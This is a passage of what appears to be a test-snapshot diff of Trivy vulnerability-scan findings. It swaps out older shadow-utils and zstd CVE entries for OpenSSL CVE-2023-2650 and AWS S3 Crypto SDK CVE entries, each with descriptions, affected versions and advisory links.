content(ConfigMap 'extension-apiserver-authentication' in 'kube-system' namespace stores sensitive contents in key(s) or value(s) '{"requestheader-username-headers"}')", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://avd.aquasec.com/misconfig/avd-ksv-0110", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4899", - "installedVersion": "1.4.8+dfsg-2.1", - "packageName": "libzstd1", + "fixedVersion": "3.1.1-r0", + "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2023-2650", + "installedVersion": "3.1.0-r4", + "packageName": "libcrypto3", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-4899", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", - "https://github.com/facebook/zstd/issues/3200", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", - "https://www.cve.org/CVERecord?id=CVE-2022-4899", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://linux.oracle.com/cve/CVE-2023-2650.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://ubuntu.com/security/notices/USN-6188-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", "mitigation": undefined, - "name": "buffer overrun in util.c", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4899", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4899", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://github.com/facebook/zstd/issues/3200", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.8.1-1", - "packageName": "login", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.8.1-1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", - ], - }, - "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://ubuntu.com/security/notices/USN-6188-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.1.1-r0", + "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2023-2650", + "installedVersion": "3.1.0-r4", + "packageName": "libssl3", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://linux.oracle.com/cve/CVE-2023-2650.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://ubuntu.com/security/notices/USN-6188-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", + ], + }, + "category": "Vulnerability", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": undefined, + "name": "Possible DoS translating ASN.1 object identifiers", + "references": [ { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.8.1-1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", - ], - }, - "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://ubuntu.com/security/notices/USN-6188-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.8.1-1", - "packageName": "login", + "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8911", + "installedVersion": "v1.44.245", + "packageName": "github.com/aws/aws-sdk-go", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "https://access.redhat.com/security/cve/CVE-2020-8911", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8911", ], }, "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", + "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - }, - { - "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://avd.aquasec.com/nvd/cve-2020-8911", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://access.redhat.com/security/cve/CVE-2020-8911", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", + "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8912", + "installedVersion": "v1.44.245", + "packageName": "github.com/aws/aws-sdk-go", "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "https://access.redhat.com/security/cve/CVE-2020-8912", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8912", ], }, "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://avd.aquasec.com/nvd/cve-2020-8912", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://access.redhat.com/security/cve/CVE-2020-8912", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, { "type": "URL", - "value": 